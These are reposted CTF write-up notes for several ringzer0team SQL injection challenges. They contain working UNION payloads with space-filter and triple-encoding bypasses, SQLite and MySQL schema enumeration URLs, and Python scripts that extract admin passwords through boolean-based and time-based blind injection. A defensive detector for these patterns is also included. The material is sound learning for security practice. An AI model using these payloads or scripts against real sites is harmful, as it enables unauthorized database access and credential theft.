ringzer0team.com CTF notes

- SQL injection section:

Quote of the day -- the query result is echoed on the page, so try a UNION injection. Spaces turn out to be filtered; use /**/ or %0a in their place.

https://ringzer0team.com/challenges/37?q=8/**/union/**/select/**/1,database()


Result: the current database is sqli_quote


https://ringzer0team.com/challenges/37?q=8/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=0x73716c695f71756f7465)


Result (table names): Quote of the day: alkdjf4iu,quotes


https://ringzer0team.com/challenges/37?q=8/**/union/**/select/**/1,(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x616c6b646a66346975)


Result (columns): Quote of the day: id,flag

https://ringzer0team.com/challenges/37?q=8/**/union/**/select/**/1,(select/**/flag/**/from/**/alkdjf4iu/**/limit/**/0,1)

Result (flag): Quote of the day: FLAG-bB6294R6cmLUlAu6H71sTd2J


=====

Thinking outside the box is the key -- this one turns out to be a UNION injection against SQLite. The following statement displays the SQLite version number.

https://ringzer0team.com/challenges/39/?id=3 union select 1,sqlite_version() #


https://ringzer0team.com/challenges/39/?id=3%20union%20select%201,(select%20name%20from%20sqlite_master%20limit%200,1)%20#

https://ringzer0team.com/challenges/39/?id=3 union select 1,(select group_concat(tbl_name) from sqlite_master where type='table')

Guess which table holds the flag from the list returned: random_stuff,ajklshfajks,troll,aatroll

https://ringzer0team.com/challenges/39/?id=3 union select 1,(select group_concat(sql) from sqlite_master where name='ajklshfajks')

CREATE TABLE ajklshfajks (flag varchar(40)) 

https://ringzer0team.com/challenges/39/?id=3 union select 1,(select flag from ajklshfajks limit 0,1 )

FLAG-13lIBUTHNFLEprz2KKMx6yqV   



=============

When it's lite it's not necessarily easy


Entering admin / 1 gives the message "Invalid username / password."
Entering 1 / 1 gives the message "No user found."




Guess: the application first looks up the username, and only if a user is found does it go on to compare the password.
So this is an ordinary boolean-based blind injection.


Payloads:
password=1&username=1' or ('4'='5') and 'a'='a  , returns No user found


password=1&username=1' or ('4'='4') and 'a'='a  , returns Invalid username / password


In other words, whenever the '4'='4' condition is true, the page responds with Invalid username / password.


Python script:

import requests
import string

url = "https://ringzer0team.com/challenges/19"
# Session cookies copied from the logged-in browser session
cookie = {
    "PHPSESSID": "q9k4np79r1uf4fuss3lt0lreh1",
    "_ga": "GA1.2.884720986.1529671391",
    "_gid": "GA1.2.884720986.1529671391"
}

# Character set tried for each position of the admin password
charset = "0123456789" + string.ascii_letters + "-_!@#$^&*()={}"

flag = ""
for i in range(1, 10):
    print("i:", i)
    for j in charset:
        data = {
            # Boolean condition: true when the i-th character of admin's password is j
            "username": "1' or (substr((select password from users where username='admin'),%s,1)='%s') and 'a'='a" % (i, j),
            # "username": "1' or (substr((select password from users where username ='admin' limit 0,1),1,1)='4') and 'a'='a",
            "password": "1"  # recovered password: 4dm1nzP455
        }

        r = requests.post(url=url, data=data, cookies=cookie)
        # "Invalid username / password" means the user lookup succeeded, i.e. the condition was true
        if "Invalid username / password" in r.text:
            flag += j
            print(flag)
            break


No more hacking for me!
From the page source:


<!-- l33t dev comment: -->
<!-- No more hacking attempt we implemented the MOST secure filter -->
<!-- urldecode(addslashes(str_replace("'", "", urldecode(htmlspecialchars($_GET['id'], ENT_QUOTES))))) -->
The single quote is stripped by this filter.
Together with the browser's own URL decoding, the input goes through three decoding passes in total.
Encoding the single quote three times gives %252527.
Trying a UNION injection shows there are three columns.

https://ringzer0team.com/challenges/74/?id=1 %252527 union select 1,2,3--
Column 2 is echoed.
So enumerate through it.


http://ringzer0team.com/challenges/74/?id=0%252527 union all select 1,tbl_name,3 FROM sqlite_master WHERE type=%252527table%252527  limit 0,1 -- 
http://ringzer0team.com/challenges/74/?id=0%252527 union all select 1,sql,3 FROM sqlite_master WHERE type=%252527table%252527  and tbl_name=%252527random_data%252527 limit 0,1 -- 


random_data  CREATE TABLE random_data (id int, message varchar(50), display int) 


http://ringzer0team.com/challenges/74/?id=0%252527 union all select 1,message,3 FROM random_data limit 2,1 --


Note: why the SQLite enumeration has to be written this way still needs further study.
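As an added defensive example (not part of the original writeup): a small Python detector that normalizes request paths by repeated percent-decoding and then flags the two evasion patterns seen in these challenges, comment sequences or control characters standing in for spaces (the /**/ and %0a trick from the first challenge) and multiply-encoded quotes (the %252527 trick here). The request paths are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample request paths, modelled on the payload shapes discussed above
SAMPLE_REQUESTS = [
    "/challenges/37?q=8",
    "/challenges/37?q=8/**/union/**/select/**/1,database()",
    "/challenges/37?q=8%0aunion%0aselect%0a1,database()",
    "/challenges/74/?id=1%252527%20union%20select%201,2,3--",
    "/challenges/39/?id=3%20union%20select%201,sqlite_version()",
    "/challenges/19?user=alice",
]

# UNION ... SELECT with any mix of whitespace or comment characters between the
# keywords, plus direct probes of the SQLite / MySQL schema catalogues
SQLI_RE = re.compile(r"(?i)\bunion\b[\s/*]+(?:all[\s/*]+)?select\b|\bsqlite_master\b|\binformation_schema\b")
# Comment sequences or control characters used in place of spaces
ODD_WS_RE = re.compile(r"/\*\*/|[\n\t]")


def decode_layers(value, max_rounds=3):
    """Percent-decode until the value stops changing; return (decoded, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
        rounds += 1
    return value, rounds


def classify(path):
    """Return the list of suspicious traits found in one request path."""
    decoded, rounds = decode_layers(path)
    findings = []
    if ODD_WS_RE.search(decoded):
        findings.append("odd-whitespace")
    if rounds >= 2:  # a normal client percent-encodes exactly once
        findings.append("multi-encoded")
    if SQLI_RE.search(decoded):
        findings.append("union-or-schema-probe")
    return findings


def scan(paths):
    """Map each flagged path to its findings; clean requests are left out."""
    result = {}
    for path in paths:
        findings = classify(path)
        if findings:
            result[path] = findings
    return result


if __name__ == "__main__":
    for path, findings in scan(SAMPLE_REQUESTS).items():
        print(path, "->", ", ".join(findings))
```

Decoding stops after three rounds so that a legitimately encoded "%25" in a parameter value cannot be unwrapped forever; the multi-encoded flag alone is worth reviewing even when no SQL keyword follows.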



=============


Login portal 4

Time-based blind injection:

import requests

url = "https://ringzer0team.com/challenges/6"
# Session cookies copied from the logged-in browser session
cookie = {
    "PHPSESSID": "vtqgjp8amva1fsr6eolee70af4",
    "_ga": "GA1.2.1724649637.1519735081",
    "_gid": "GA1.2.933125333.1519735081",
    "_gat": "1"
}

flag = ""
for i in range(1, 1000):
    for j in range(33, 127):
        print("i:", i, "j:", j)
        data = {
            # If the i-th byte of the first password equals j, the server sleeps for 3 s
            "username": "1' || if((ascii(substr((select password from users limit 0,1),%s,1))=%s),sleep(3),1) || '" % (i, j),
            "password": "1"
        }
        try:
            # The timeout is shorter than sleep(3), so a timeout means the guess was right
            r = requests.post(url=url, data=data, cookies=cookie, timeout=2.5)
        except requests.exceptions.Timeout:
            flag += chr(j)
            print(flag)
            break
    else:
        # No character matched at this position: the end of the password has been reached
        break

A few notes on the code:

1. ascii() is used for the comparison rather than a direct string comparison because MySQL string comparison is case-insensitive.

2. || is used instead of or because, judging from testing, the backend blocks "or".



Reposted from blog.csdn.net/freshfox/article/details/80788940